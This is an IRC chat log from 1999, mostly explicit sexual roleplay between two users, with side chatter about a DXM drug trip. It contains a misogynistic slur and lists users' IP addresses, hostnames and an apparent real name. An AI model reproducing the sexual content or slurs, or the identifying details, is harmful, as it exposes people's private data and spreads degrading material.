  2247. [rachel_(nobans@166-87-97.ipt.aol.com)] haha ummo wont believe u
  2248. [rachel_(nobans@166-87-97.ipt.aol.com)] er gummo
  2249. [msg(rachel_)] HEH 
  2250. [msg(asphxia)] HEH ok today!?!?!!
  2251. [msg(asphxia)] HEH ??!?!!?
  2252. [msg(asphxia)] HEH u better not turn out to be a man HGHEH!
  2253. ∙φ∙ tip [tip@209.107.78.20] has joined #falon
  2254. <tip> yo yo yo yo
  2255. <chrak> yo
  2256. <tip> i'm gonna...
  2257. <tip> DANCE
  2258. ∙φ∙ tip [tip@209.107.78.20] has left #falon []
  2259. [msg(tip)] HEH im trying to get phone/cyber sex from phixes girlfriend HEH!!!
  2260. [asphxia(bg0124a@216.76.138.90)] i am not a man
  2261. [msg(tip)] she said if i mail her money she will so HEH. 
  2262. [msg(asphxia)] HEH ok
  2263. [tip(tip@209.107.78.20)] HUH?
  2264. ≡ asphxia lays down naked on your bed
  2265. [msg(tip)] HEH shut up im getting laid
  2266. ∙φ∙ Starting conversation with asphxia
  2267. [tip(tip@209.107.78.20)] werd
  2268. [msg(asphxia)] heh ok
  2269. [msg(asphxia)] HEH hurry up im whacking off to pt0n HEH!!
  2270. ≡ asphxia starts to play with her clirt
  2271. [msg(asphxia)] pr0n!
  2272. [asphxia(bg0124a@216.76.138.90)] -r
  2273. [msg(asphxia)] HEH huh ?
  2274. [msg(asphxia)] well
  2275. [msg(asphxia)] lets hurry p im leavin in 40 minutes HEh and i wnna talk to someone on irc after u HEH!
  2276. [asphxia(bg0124a@216.76.138.90)] ok
  2277. [asphxia(bg0124a@216.76.138.90)] ok
  2278. ≡ asphxia starts to rub her clit harder
  2279. [msg(asphxia)] oHEH r u like fingering urself or some shit HEH ?
  2280. ≡ asphxia sucks on the head of your dick
  2281. ≡ asphxia puts her fingers in to her wet pussy
  2282. [msg(asphxia)] HEH ur not seriously doing that r u HEH ?
  2283. [msg(asphxia)] HEH ok
  2284. [msg(asphxia)] keep tyalking!! HEH
  2285. ≡ -> chrak/asphxia HEH me starts liek uNFIng u HH!
  2286. [msg(asphxia)] HEH!@!!
  2287. ┌─────---─--──-──────---─--──-─────────--- --  -
  2288. | asphxia (bg0124a@216.76.138.90) (unknown)
  2289. │ ircname  : bree
  2290. | channels : #atlantaga 
  2291. │ server   : irc.emory.edu ([170.140.4.6] Emory University)
  2292. [msg(asphxia)] HEH helloo HEH !!
  2293. [msg(asphxia)] u cant just start and stop  HEH!!
  2294. [msg(asphxia)] it sux like that!!!
  2295. [ Channel  ][ Nickname ][ user@host                       ][ level         ]
  2296. [#falon    ][@chrak    ][sean@cpwright.com                ] [n/a]
  2297. [#falon    ][@Falon    ][~Falon@x2-11.cosmoaccess.net     ] [n/a]
  2298. [#falon    ][@liquidhex][ketamine@nw50.netwave.ca         ] [n/a]
  2299. [#falon    ][@rachel_  ][nobans@166-87-97.ipt.aol.com     ] [n/a]
  2300. [msg(rachel)] HEH omg
  2301. [msg(rachel_)] HEH omg
  2302. [msg(rachel_)] she stopped cybering me for no reason HEH!!
  2303. [msg(rachel_)] HEH
  2304. [msg(rachel_)] unless she is really doing the shit she is saying shes doing HEH!
  2305. ┌─────---─--──-──────---─--──-─────────--- --  -
  2306. | chrak (sean@cpwright.com) (Internic Commercial)
  2307. │ ircname  : Sean Harny
  2308. | channels : #b4b0 #dr00gz @#falon 
  2309. │ server   : irc.cs.cmu.edu (calloc(1,sizeof(geek)))
  2310. : idle     : 0 hours 0 mins 39 secs (signon: Tue Feb 23 14:35:33 1999)
  2311. [ctcp(asphxia)] PING
  2312. ┌─────---─--──-──────---─--──-─────────--- --  -
  2313. | asphxia (bg0124a@216.76.138.90) (unknown)
  2314. │ ircname  : bree
  2315. | channels : #atlantaga 
  2316. │ server   : irc.emory.edu ([170.140.4.6] Emory University)
  2317. ∙φ∙ [#h] Bad channel key
  2318. ┌─────---─--──-──────---─--──-─────────--- --  -
  2319. | asphxia (bg0124a@216.76.138.90) (unknown)
  2320. │ ircname  : bree
  2321. | channels : #atlantaga 
  2322. │ server   : irc.emory.edu ([170.140.4.6] Emory University)
  2323. [ctcp(asphxia)] PING
  2324. <chrak> HEh her server is like dying or some shit HEH
  2325. [ctcp(asphxia)] PING
  2326. [ctcp(asphxia)] PING
  2327. [ctcp(#falon)] PING
  2328. ∙φ∙ Ignorance List:
  2329.   [ 1]                     #b4b0:  ALL
  2330. ∙φ∙ chrak [sean@cpwright.com] has joined #phrack
  2331. ∙φ∙ Topic for #phrack: shoe.
  2332. ∙φ∙ topic set by apropos [Tue Feb 23 01:04:13 1999]
  2333. ∙φ∙ [Users(#phrack:65)] 
  2334. [ chrak     ] [ fail      ] [@hmf       ] [ simpleton ] [ RedRasta  ] 
  2335. [@loadammo  ] [ b0n3r     ] [ gweeds    ] [ fungus    ] [ awr       ] 
  2336. [ [JFK]     ] [ batz      ] [ tyme      ] [ ecx       ] [ emoz      ] 
  2337. [ _jcd      ] [@eb_       ] [@vis10n    ] [ kaotik    ] [ g00ey     ] 
  2338. [ F0uRier   ] [ fiji      ] [@angstrom  ] [ Victoria  ] [@sw1tchg0d ] 
  2339. [ infecti0n ] [ spinux    ] [ zach      ] [@d-low     ] [ cripto    ] 
  2340. [ interline ] [ dreck_    ] [@soyl3nt   ] [@miph      ] [@par       ] 
  2341. [@plaguez   ] [@halflife  ] [ yewdeepee ] [ shift4    ] [@ARP_H     ] 
  2342. [@b_        ] [ Kludge    ] [@fah_      ] [@cain      ] [ apathy    ] 
  2343. [@lanfear   ] [ hi_       ] [ Neural_   ] [ thwack    ] [ i87       ] 
  2344. [@route     ] [@apropos   ] [@soylent   ] [@bovine    ] [@p-wInd0Wz ] 
  2345. [@kamee     ] [ neurostim ] [ krnl      ] [ kweiheri  ] [ meenk     ] 
  2346. [@ikol      ] [@syke      ] [ enr1que   ] [@nihilis   ] [ theclerk  ] 
  2347. ∙φ∙ [Users(#phrack:13)] 
  2348. [@sirsyko   ] [ falken    ] [@rogerb    ] [ snowman   ] [ fx        ] 
  2349. [@felix     ] [ nocarrier ] [ chris     ] [@FrontLine ] [ gaius_    ] 
  2350. [@kiad      ] [@tmcm      ] [@silitek   ] 
  2351. ∙φ∙ Channel #phrack was created at Sat Jul 18 08:25:57 1998
  2352. ∙φ∙ BitchX: Join to #phrack was synced in 0.292 secs!!
  2353. ∙φ∙ chrak [sean@cpwright.com] has left #phrack []
  2354. ∙φ∙ chrak [sean@cpwright.com] has joined #chat
  2355. ∙φ∙ Topic for #chat: le porc frangais indique que vous joindrez mes ligions 
  2356. ∙φ∙ topic set by Chewbacca [Tue Feb 23 15:19:08 1999]
  2357. ∙φ∙ [Users(#chat:28)] 
  2358. [ chrak     ] [ zahr      ] [ skibum1   ] [ RuFfrYdEr ] [ Luvman    ] 
  2359. [ billisray ] [ iibmoz    ] [ FireLord  ] [ uberpig   ] [@PartyDr   ] 
  2360. [@ssmile    ] [ Poisoned  ] [ kasper    ] [ Cochise   ] [@Wildcard  ] 
  2361. [ Sigma2000 ] [@Gobo      ] [@Porthos   ] [ Zooj      ] [@Fedaykin  ] 
  2362. [@Chewbacca ] [ `cat      ] [ Hrunting  ] [@shinsei   ] [@Babylon   ] 
  2363. [@Athos     ] [@Aramis    ] [@Lao-Tzu   ] 
  2364. ∙φ∙ Channel #chat was created at Wed Feb  3 12:44:48 1999
  2365. ∙φ∙ BitchX: Join to #chat was synced in 0.176 secs!!
  2366. [msg(asphxia)] HEH
  2367. ∙φ∙ chrak [sean@cpwright.com] has left #chat []
  2368. ∙φ∙ Ignorance List:
  2369.   [ 1]                     #b4b0:  ALL
  2370. ∙φ∙ Connecting to port 6667 of server irc.prison.net [refnum 12]
  2371. !irc.prison.net Looking up your hostname...
  2372. !irc.prison.net Checking Ident
  2373. !irc.prison.net Got Ident response
  2374. !irc.prison.net Found your hostname
  2375. ∙φ∙ Your nick [chrak] is owned by sean@cpwright.com
  2376. ∙φ∙ BitchX: For more information about BitchX type /about
  2377. ∙φ∙ Welcome to the Internet Relay Network chrak_ 
  2378. ∙φ∙ Your host is irc.Prison.NET[irc], running version 2.8.21+RF+CSr30 
  2379. ∙φ∙ This server was created Mon Nov 23 1998 at 10 29:13 PST
  2380. ∙φ∙ irc.Prison.NET 2.8.21+RF+CSr30 oiwsfcukbdl biklmnopstv 
  2381. ∙φ∙ [local users on irc(796)] 2%
  2382. ∙φ∙ [global users on irc(5575)] 12%
  2383. ∙φ∙ [invisible users on irc(40720)] 88%
  2384. ∙φ∙ [ircops on irc(187)] 0%
  2385. ∙φ∙ [total users on irc(46295)]
  2386. ∙φ∙ [unknown connections(0)]
  2387. ∙φ∙ [total servers on irc(45)] (avg. 1028 users per server)
  2388. ∙φ∙ [total channels created(19156)] (avg. 2 users per channel)
  2389. ∙φ∙ [Highest client connection count(1452) (1451)]
  2390. ∙φ∙ Mode change [+iw] for user chrak_
  2391. ∙φ∙ Topic for #b4b0: r4lph has quit b4b0. I've massd'd the place to commemorate his fine service.
  2392. ∙φ∙ topic set by Stoner [Mon Feb 22 17:49:36 1999]
  2393. ∙φ∙ [Users(#b4b0:23)] 
  2394. [ chrak_    ] [ raychel-  ] [ Oroku     ] [ MostHateD ] [ rachel_   ] 
  2395. [ chrak     ] [ Deads0u|  ] [ m0f0      ] [ F0uRier   ] [ ne0h      ] 
  2396. [ pahrohfit ] [ e-        ] [ espionage ] [vz0rt      ] [ zayten    ] 
  2397. [ bluetip   ] [vb4b0      ] [ gb        ] [ malloc-   ] [ liquidhex ] 
  2398. [ sadjester ] [ gob       ] [ tip       ] 
  2399. ∙φ∙ chrak_ [~hmm@cpwright.com] has joined #dr00gz
  2400. ∙φ∙ [Users(#dr00gz:5)] 
  2401. [ chrak_    ] [ chrak     ] [@PHiNG     ] [ liquidhex ] [@irrupt    ] 
  2402. ∙φ∙ chrak_ [~hmm@cpwright.com] has joined #falon
  2403. ∙φ∙ [Users(#falon:6)] 
  2404. [ chrak_    ] [ raychel-  ] [@rachel_   ] [@chrak     ] [@Falon     ] 
  2405. [@liquidhex ] 
  2406. ∙φ∙ Channel #b4b0 was created at Mon Jan 25 17:26:24 1999
  2407. ∙φ∙ BitchX: Join to #b4b0 was synced in 9.500 secs!!
  2408. ∙φ∙ Channel #dr00gz was created at Sun Feb 21 19:35:58 1999
  2409. ∙φ∙ BitchX: Join to #dr00gz was synced in 15.124 secs!!
  2410. ∙φ∙ Channel #falon was created at Tue Feb 23 07:24:25 1999
  2411. [ Channel  ][ Nickname ][ user@host                       ][ level         ]
  2412. [#falon    ][@chrak    ][sean@cpwright.com                ] [n/a]
  2413. [#falon    ][ chrak_   ][~hmm@cpwright.com                ] [n/a]
  2414. [#falon    ][@Falon    ][~Falon@x2-11.cosmoaccess.net     ] [n/a]
  2415. [#falon    ][@rachel_  ][nobans@166-87-97.ipt.aol.com     ] [n/a]
  2416. [#falon    ][ raychel- ][nobans@171-170-154.ipt.aol.com   ] [n/a]
  2417. ∙φ∙ BitchX: Join to #falon was synced in 21.486 secs!!
  2418. [msg(asphxia)] HEH ok
  2419. <raychel-> chrak it happened to me too :\
  2420. ┌─────---─--──-──────---─--──-─────────--- --  -
  2421. | asphxia (bg0124a@216.76.138.90) (unknown)
  2422. │ ircname  : bree
  2423. | channels : #atlantaga 
  2424. │ server   : irc.emory.edu ([170.140.4.6] Emory University)
  2425. <irrupt:#dr00gz> hey do0d
  2426. ∙φ∙ SignOff rachel_: #falon (Ping timeout: 240 seconds)
  2427. [msg(asphxia)] msg me plz HEH
  2428. [ Channel  ][ Nickname ][ user@host                       ][ level         ]
  2429. [#falon    ][@chrak    ][sean@cpwright.com                ] [n/a]
  2430. [#falon    ][ chrak_   ][~hmm@cpwright.com                ] [n/a]
  2431. [#falon    ][@Falon    ][~Falon@x2-11.cosmoaccess.net     ] [n/a]
  2432. [#falon    ][@liquidhex][ketamine@nw50.netwave.ca         ] [n/a]
  2433. [#falon    ][ raychel- ][nobans@171-170-154.ipt.aol.com   ] [n/a]
  2434. [msg(asphxia)] ok
  2435. [asphxia(bg0124a@216.76.138.90)] nm
  2436. [msg(asphxia)] hehe
  2437. [msg(asphxia)] heh
  2438. [asphxia(bg0124a@216.76.138.90)] deal is off
  2439. [msg(asphxia)] huh ??
  2440. [Falon(~Falon@x2-11.cosmoaccess.net)] hey
  2441. [msg(asphxia)] huh ?
  2442. [msg(asphxia)] HEH!!
  2443. [msg(asphxia)] why HEH ?
  2444. [msg(falon)] hi
  2445. ∙φ∙ Ending conversation with asphxia
  2446. <chrak_> OMG
  2447. <chrak_> she just said
  2448. <chrak_> 'deal is off'
  2449. <chrak_> fucking
  2450. [msg(asphxia)] HEH the server died HEH!!!!!
  2451. [ Channel  ][ Nickname ][ user@host                       ][ level         ]
  2452. [#falon    ][@chrak    ][sean@cpwright.com                ] [n/a]
  2453. [#falon    ][ chrak_   ][~hmm@cpwright.com                ] [n/a]
  2454. [#falon    ][@Falon    ][~Falon@x2-11.cosmoaccess.net     ] [n/a]
  2455. [#falon    ][@liquidhex][ketamine@nw50.netwave.ca         ] [n/a]
  2456. [#falon    ][ raychel- ][nobans@171-170-154.ipt.aol.com   ] [n/a]
  2457. <chrak_> fucki
  2458. <chrak_> ng
  2459. <raychel-> ahahaha
  2460. [msg(asphxia)] HEH damnbitch slut 
  2461. ∙φ∙ You're not opped on #falon
  2462. <chrak_> EH
  2463. <chrak_> HEh
  2464. <chrak_> BAN asphxia
  2465. <chrak_> i dont need
  2466. [msg(asphixa)] HEH!!
  2467. asphixa: No such nick/channel
  2468. <chrak_> she said
  2469. [ Channel  ][ Nickname ][ user@host                       ][ level         ]
  2470. [#falon    ][@chrak    ][sean@cpwright.com                ] [n/a]
  2471. [#falon    ][ chrak_   ][~hmm@cpwright.com                ] [n/a]
  2472. [#falon    ][@Falon    ][~Falon@x2-11.cosmoaccess.net     ] [n/a]
  2473. [#falon    ][@liquidhex][ketamine@nw50.netwave.ca         ] [n/a]
  2474. [#falon    ][ raychel- ][nobans@171-170-154.ipt.aol.com   ] [n/a]
  2475. <chrak_> HEH
  2476. [msg(asphxia)] HEH
  2477. <chrak_> she said
  2478. <chrak_> she would cyber me and wastes like 20 mniutes of my tyime HEh
  2479. <chrak_> its not like its sex HEH!
  2480. <chrak_> where she haz a right to say no HEH.
  2481. <chrak_> if i agree that iz HEH
  2482. [asphxia(bg0124a@216.76.138.90)] hey
  2483. ≡ asphxia licks your inner thigh
  2484. [msg(asphxia)] HEH Werd up ?
  2485. <chrak_> HEh
  2486. <chrak_> ohh nm
  2487. <raychel-> hahah
  2488. <chrak_> she startsed agian
  2489. <chrak_> HEH
  2490. ∙φ∙ Starting conversation with asphxia
  2491. <raychel-> hehe ok
  2492. [msg(asphxia)] heh
  2493. ≡ -> chrak_/asphxia likes ur outer pussy lips HEH
  2494. [Falon(~Falon@x2-11.cosmoaccess.net)] hmm
  2495. [asphxia(bg0124a@216.76.138.90)] mmmmm
  2496. ≡ asphxia fingers her pussy
  2497. [Falon(~Falon@x2-11.cosmoaccess.net)] you are really strange
  2498. [asphxia(bg0124a@216.76.138.90)] mmmm
  2499. [msg(asphxia)] HEH r u really getting off HEH
  2500. [msg(asphxia)] HEH
  2501. <irrupt:#dr00gz> there
  2502. ≡ -> chrak_/asphxia resumes whacking off HEh continue talking plz HEH!
  2503. ∙φ∙ ph1x [sickmade@01-029.009.popsite.net] has joined #Dr00gz
  2504. <irrupt:#dr00gz> got rid of a few potential hazards fer ya too
  2505. <ph1x:#Dr00gz> HEH!
  2506. <irrupt:#dr00gz> rpc. daemons
  2507. <irrupt:#dr00gz> erm
  2508. <irrupt:#dr00gz> wrong damn channel
  2509. <raychel-> i must go
  2510. <ph1x:#Dr00gz> I've done like 8 math assignments today BABY
  2511. <ph1x:#Dr00gz> HEH!
  2512. [msg(raychel-)] HEH by
  2513. <raychel-> bye!
  2514. [raychel-(nobans@171-170-154.ipt.aol.com)] bye :D
  2515. [raychel-(nobans@171-170-154.ipt.aol.com)] ill bbi like 30
  2516. [msg(asphxia)] HEH
  2517. [raychel-(nobans@171-170-154.ipt.aol.com)] i just hafta make a call LD
  2518. [raychel-(nobans@171-170-154.ipt.aol.com)] er :D
  2519. [msg(raychel-)] HEH ok damn asphxia sux at this shes slooooow typer HEH
  2520. [msg(asphxia)] HEH r u just 
  2521. [msg(asphxia)] doing this
  2522. [raychel-(nobans@171-170-154.ipt.aol.com)] hahha
  2523. [raychel-(nobans@171-170-154.ipt.aol.com)] ok
  2524. [msg(asphxia)] to piss me off HEHEH!!
  2525. [msg(asphxia)] like
  2526. [msg(asphxia)] HEH.
  2527. [raychel-(nobans@171-170-154.ipt.aol.com)] later
  2528. ∙φ∙ SignOff raychel-: #falon (Giving in won't stop the noise.)
  2529. [msg(asphxia)] start making me whack off
  2530. [msg(asphxia)] then
  2531. [msg(asphxia)] stop
  2532. [msg(asphxia)] talking HEH!
  2533. [msg(asphxia)] HEH me
  2534. [msg(asphxia)] begins
  2535. [msg(asphxia)] to
  2536. ≡ asphxia strokes her pussy with one hand and your phat cock
  2537. [asphxia(bg0124a@216.76.138.90)] with the other
  2538. ∙φ∙ mode/#falon [+o chrak_] by Falon
  2539. ≡ -> chrak_/asphxia moans HEH
  2540. ≡ asphxia wants you to put your hand in her pussy
  2541. [asphxia(bg0124a@216.76.138.90)] shit ph1x is on
  2542. ≡ -> chrak_/asphxia puts his hand ALL the way up there HEH!
  2543. ∙φ∙ ph1x [sickmade@01-029.009.popsite.net] has joined #falon
  2544. ≡ asphxia still wants you though
  2545. <ph1x> HEH!@#$
  2546. ≡ asphxia starts to get wet
  2547. [msg(asphxia)] HEH ok ignore him HEH!!
  2548. <ph1x> chrak
  2549. ∙φ∙ ph1x [sickmade@01-029.009.popsite.net] has left #falon []
  2550. [msg(ph1x)] wait like 5 minutes ok HEH ?
  2551. [ph1x(sickmade@01-029.009.popsite.net)] HEH
  2552. [ph1x(sickmade@01-029.009.popsite.net)] FOR WHAT?
  2553. [ph1x(sickmade@01-029.009.popsite.net)] HEH!
  2554. [ph1x(sickmade@01-029.009.popsite.net)] asphxia my women is on
  2555. [ph1x(sickmade@01-029.009.popsite.net)] HEH!
  2556. [msg(asphxia)] HEH jsut ms me shit HEH cause im whacking off
  2557. [ph1x(sickmade@01-029.009.popsite.net)] HEH!@#$
  2558. [ph1x(sickmade@01-029.009.popsite.net)] HEHAHHEHAH
  2559. [msg(asphxia)] HEH ph1x is here yes HEH hurry up HEH!
  2560. [msg(asphxia)] im looking at pr0n so it wont take long HEH if i hurry
  2561. ≡ asphxia licks the head of your dick
  2562. [asphxia(bg0124a@216.76.138.90)] mmmmmmm
  2563. [asphxia(bg0124a@216.76.138.90)] put it in me
  2564. ≡ -> chrak_/ashxia puts it in u
  2565. ashxia: No such nick/channel
  2566. ≡ -> chrak_/asphxia puts it in u
  2567. [asphxia(bg0124a@216.76.138.90)] mmm
  2568. ≡ asphxia squeals
  2569. [asphxia(bg0124a@216.76.138.90)] it feels sooo good
  2570. ≡ -> chrak_/asphxia IZ APPROCHING ORGASM FROM THIS STUPID EXCUSE FOR SEX HEH@!@A!@
  2571. ∙φ∙ NetSplit: irc-e.frontiernet.net split from irc.exodus.net [03:37pm]
  2572. ∙φ∙ BitchX: Press Ctrl-F to see who left Ctrl-E to change to [irc-e.frontiernet.net]
  2573. [asphxia(bg0124a@216.76.138.90)] mmmmmm
  2574. ≡ asphxia rides your big cock
  2575. [asphxia(bg0124a@216.76.138.90)] ohhh
  2576. [asphxia(bg0124a@216.76.138.90)] you feel how wet i am
  2577. [msg(asphxia)] HEH yep
  2578. ∙φ∙ SignOff ph1x: #dr00gz (Leaving)
  2579. [asphxia(bg0124a@216.76.138.90)] mmmmm]
  2580. ≡ asphxia purrs
  2581. [asphxia(bg0124a@216.76.138.90)] fuck me hard
  2582. [asphxia(bg0124a@216.76.138.90)] i want to feel you cum
  2583. [msg(asphxia)] heh i am HEH
  2584. [msg(asphxia)] im whacking off HEH!!!
  2585. [asphxia(bg0124a@216.76.138.90)] you are?
  2586. [msg(asphxia)] HEH YEP
  2587. [msg(asphxia)] well
  2588. [msg(asphxia)] ok
  2589. [msg(asphxia)] HEH
  2590. ≡ asphxia wants to feel you cum all inside her
  2591. [msg(asphxia)] im fucking u HEH!
  2592. [asphxia(bg0124a@216.76.138.90)] oooooh
  2593. [msg(asphxia)] EHEH ok her we go
  2594. [asphxia(bg0124a@216.76.138.90)] fuck me harder
  2595. ≡ asphxia squeals
  2596. ≡ asphxia turns over and inserts your cock into her tight ass
  2597. ∙φ∙ asphxia [bg0124a@216.76.138.90] has joined #dr00gz
  2598. [msg(asphxia)] hehe
  2599. [msg(asphxia)] ok im almost cumming HEH 
  2600. <asphxia:#dr00gz> hiya
  2601. [msg(asphxia)] just type some more shit HEh
  2602. [msg(asphxia)] and say
  2603. [msg(asphxia)] 'ohh chrak HEH'
  2604. [msg(asphxia)] like moan it HEH!!!!
  2605. ∙φ∙ SignOff liquidhex: #dr00gz,#falon (Ping timeout)
  2606. [ Channel  ][ Nickname ][ user@host                       ][ level         ]
  2607. [#falon    ][@chrak_   ][~hmm@cpwright.com                ] [n/a]
  2608. [#falon    ][@Falon    ][~Falon@x2-11.cosmoaccess.net     ] [n/a]
  2609. ∙φ∙ BitchX: Ambiguous command: F
  2610. [msg(asphxia)] f
  2611. ┌─────---─--──-──────---─--──-─────────--- --  -
  2612. | asphxia (bg0124a@216.76.138.90) (unknown)
  2613. │ ircname  : bree
  2614. | channels : #dr00gz 
  2615. │ server   : irc.emory.edu ([170.140.4.6] Emory University)
  2616. ∙φ∙ ph1x [sickmade@01-029.009.popsite.net] has joined #falon
  2617. [asphxia(bg0124a@216.76.138.90)] ohhh crack HEH
  2618. ∙φ∙ ph1x [sickmade@01-029.009.popsite.net] has joined #dr00gz
  2619. [asphxia(bg0124a@216.76.138.90)] fuck me harded
  2620. [msg(asphxia)] heh
  2621. [msg(asphxia)] ij
  2622. [asphxia(bg0124a@216.76.138.90)] your cock feels sooo good in my asss
  2623. [asphxia(bg0124a@216.76.138.90)] mmmm
  2624. <ph1x:#dr00gz> hmMmmmm
  2625. [msg(asphxia)] ur ass is about to get like
  2626. [msg(asphxia)] filled up with cum HEH@
  2627. [msg(asphxia)] !!
  2628. ≡ asphxia rubs her clit
  2629. [asphxia(bg0124a@216.76.138.90)] yum
  2630. ≡ asphxia cannot wait
  2631. [msg(asphxia)] HEH keep talikng im almost done HEH!!!
  2632. [msg(asphxia)] HEH keep talikng im almost done HEH!!!
  2633. [msg(asphxia)] HEH keep talikng im almost done HEH!!!
  2634. ≡ asphxia rides your phat cock
  2635. [asphxia(bg0124a@216.76.138.90)] mmmmm
  2636. [asphxia(bg0124a@216.76.138.90)] fuck me hard
  2637. ≡ asphxia puts a hand inside her hot pussy
  2638. [asphxia(bg0124a@216.76.138.90)] i want to feel you come
  2639. [msg(asphxia)] HEH
  2640. ≡ -> chrak_/asphxia pinching ur nipz HEH!@
  2641. [asphxia(bg0124a@216.76.138.90)] uuum
  2642.   3:45pm  up 4 days,  2:28,  3 users,  load average: 0.00, 0.00, 0.00
  2643. USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
  2644. descende ttyp3    ron-ny13-22.ix.n  3:28pm  9:27   0.16s  0.16s  -bash 
  2645. sean     ttya1    dialup28:S.0      2:38pm  0.00s  8.86s  8.86s  BitchX chrak 
  2646. cpwright ttyp1    sls17.asb.com     3:28pm  1:09   0.38s  0.05s  talk sean 
  2647. [asphxia(bg0124a@216.76.138.90)] don't sto[
  2648. [asphxia(bg0124a@216.76.138.90)] p
  2649. [msg(asphxia)] heh
  2650. [msg(asphxia)] no u dont stop HEH im the on whacking off HEH!!
  2651. ≡ -> chrak_/asphxia places it in ur mouth HEH.
  2652. <ph1x:#dr00gz> anyone hERE?
  2653. ≡ -> chrak_/asphxia wants a BJ HEH!!! ball sucking to oHEH!!
  2654. <ph1x:#dr00gz> wakeup asphxia
  2655. [msg(ph1x)] hold on 5 minutes 
  2656. <ph1x:#dr00gz> HEH!
  2657. [ph1x(sickmade@01-029.009.popsite.net)] HEH
  2658. ≡ asphxia rubs her tongue up and down your throbbing dick
  2659. [ph1x(sickmade@01-029.009.popsite.net)] are you whacking off?
  2660. [asphxia(bg0124a@216.76.138.90)] mmmm
  2661. <irrupt:#dr00gz> nope.. noone here
  2662. ∙φ∙ mode/#dr00gz [+o ph1x] by irrupt
  2663. ∙φ∙ mode/#dr00gz [+oo chrak_ asphxia] by ph1x
  2664. <ph1x:#dr00gz> chrak is whacking off
  2665. <ph1x:#dr00gz> HEH
  2666. [msg(asphxia)] heh
  2667. <irrupt:#dr00gz> haha
  2668. <ph1x:#dr00gz> he keeps msg'ng me to holdon 5 mins
  2669. <chrak_:#dr00gz> shut up i am not HEH!
  2670. [asphxia(bg0124a@216.76.138.90)] mmmm
  2671. ┌─────---─--──-──────---─--──-─────────--- --  -
  2672. | asphxia (bg0124a@216.76.138.90) (unknown)
  2673. │ ircname  : bree
  2674. | channels : @#dr00gz 
  2675. │ server   : irc.emory.edu ([170.140.4.6] Emory University)
  2676. ≡ asphxia sucks it hard
  2677. <ph1x:#dr00gz> um
  2678. [asphxia(bg0124a@216.76.138.90)] in
  2679. <ph1x:#dr00gz> HEH
  2680. [asphxia(bg0124a@216.76.138.90)] out
  2681. <ph1x:#dr00gz> yes you are
  2682. [asphxia(bg0124a@216.76.138.90)] in out
  2683. [msg(asphxia)] herhh
  2684. [msg(asphxia)] ok
  2685. <ph1x:#dr00gz> du0d
  2686. [msg(asphxia)] suck ma balsl HEH!
  2687. <ph1x:#dr00gz> yesterday was the worst trip i've ever had on dxm
  2688. <ph1x:#dr00gz> it sucked
  2689. <ph1x:#dr00gz> HEH!
  2690. <ph1x:#dr00gz> listen to this
  2691. <ph1x:#dr00gz> My mom was bitching me out
  2692. <ph1x:#dr00gz> calling me a robo junkie
  2693. <ph1x:#dr00gz> because I told her  I drank a shitload of robotussn
  2694. <ph1x:#dr00gz> when infact I really took a bunch of pure dxm
  2695. <ph1x:#dr00gz> and I got really pissed off
  2696. <ph1x:#dr00gz> and punched a huge hole in the wall
  2697. <ph1x:#dr00gz> HEH!
  2698. <ph1x:#dr00gz> down by the stairs
  2699. <ph1x:#dr00gz> and I didnt even feel it
  2700. ≡ asphxia wraps her mouth around your balls and sucks on them
  2701. <ph1x:#dr00gz> because dxm makes your body like numb'
  2702. <ph1x:#dr00gz> HEH!
  2703. [msg(asphxia)] suck ma balsl HEH!
  2704. <ph1x:#dr00gz> I could have like karate chopped through metal
  2705. [msg(asphxia)] HEH ok
  2706. <asphxia:#dr00gz> ph1x
  2707. [msg(asphxia)] HEH ok im about to like jizz atnd shti HE Hkeep sucking !
  2708. <ph1x:#dr00gz> yes?
  2709. ≡ asphxia sucks them hard
  2710. ≡ asphxia wraps her hand around your cock
  2711. <asphxia:#dr00gz> hiya
  2712. <asphxia:#dr00gz> bebe
  2713. <ph1x:#dr00gz> I can't beleive I actually thought I could act normal in front of my parents on 800mg 
  2714. <ph1x:#dr00gz> HEH!
  2715. [asphxia(bg0124a@216.76.138.90)] mmmmmmm
  2716. <ph1x:#dr00gz> HELLO BREE
  2717. <asphxia:#dr00gz> hi bebe
  2718. <asphxia:#dr00gz> kiss
  2719. [msg(asphxia)] ok
  2720. * >ph1x #dr00gz strips dravyn naked and gets out his whip and handcuffs
  2721. [msg(asphxia)] hurry im hgonna finnish in like 30 seconds HEH
  2722. <ph1x:#dr00gz> HEH
  2723. [msg(asphxia)] so keep typing HEH!
  2724. <ph1x:#dr00gz> you ready for an orgy of pain?
  2725. ≡ asphxia pulls on your phat cock
  2726. [asphxia(bg0124a@216.76.138.90)] mmmmm
  2727. [asphxia(bg0124a@216.76.138.90)] feels so good
  2728. [asphxia(bg0124a@216.76.138.90)] i want to feel you cum
  2729. [asphxia(bg0124a@216.76.138.90)] baby
  2730. [asphxia(bg0124a@216.76.138.90)] heh
  2731. <ph1x:#dr00gz> HEH!?
  2732. <asphxia:#dr00gz> yes
  2733. [msg(asphxia)] HEH ALMOST
  2734. <asphxia:#dr00gz> from you always
  2735. <ph1x:#dr00gz> Do you like bondage?
  2736. [msg(asphxia)] GWG me niot phix HEH!
  2737. [msg(asphxia)] its annoying to stop and start HEH!!
  2738. ≡ asphxia wants you to come baby
  2739. [asphxia(bg0124a@216.76.138.90)] mmmm
  2740. ∙φ∙ mode/#falon [+o ph1x] by Falon
  2741. [asphxia(bg0124a@216.76.138.90)] ohhhh
  2742. [asphxia(bg0124a@216.76.138.90)] want to fuck
  2743. [asphxia(bg0124a@216.76.138.90)] again
  2744. [msg(asphxia)] HEH Ok
  2745. ≡ asphxia puts your hot dick into her wet pussy
  2746. [asphxia(bg0124a@216.76.138.90)] fuck me
  2747. [msg(asphxia)] type fast HEH for like one minute HEH and then il lbe done HEH
  2748. ≡ -> chrak_/asphxia starts pushing it in and out 
  2749. <asphxia:#dr00gz> yeah
  2750. [msg(asphxia)] HEH ur nort getting off to this too r u HEH .
  2751. [msg(asphxia)] this works great with pr0n in front of u too HEH!
  2752. ≡ asphxia fucks you hard
  2753. ≡ -> chrak_/asphxia starts pushing it in and out 
  2754. ≡ -> chrak_/asphxia HE Halmost done hurry up and fuck HEH!!
  2755. ≡ asphxia sucks onyour nipples
  2756. [asphxia(bg0124a@216.76.138.90)] mmmmm
  2757. ≡ asphxia 's muscles tighten
  2758. [asphxia(bg0124a@216.76.138.90)] i am gonna cum
  2759. [asphxia(bg0124a@216.76.138.90)] babe
  2760. [msg(asphxia)] HEH good
  2761. ≡ -> chrak_/asphxia me feels her puss contracting on his cock
  2762. [msg(asphxia)] HEH type
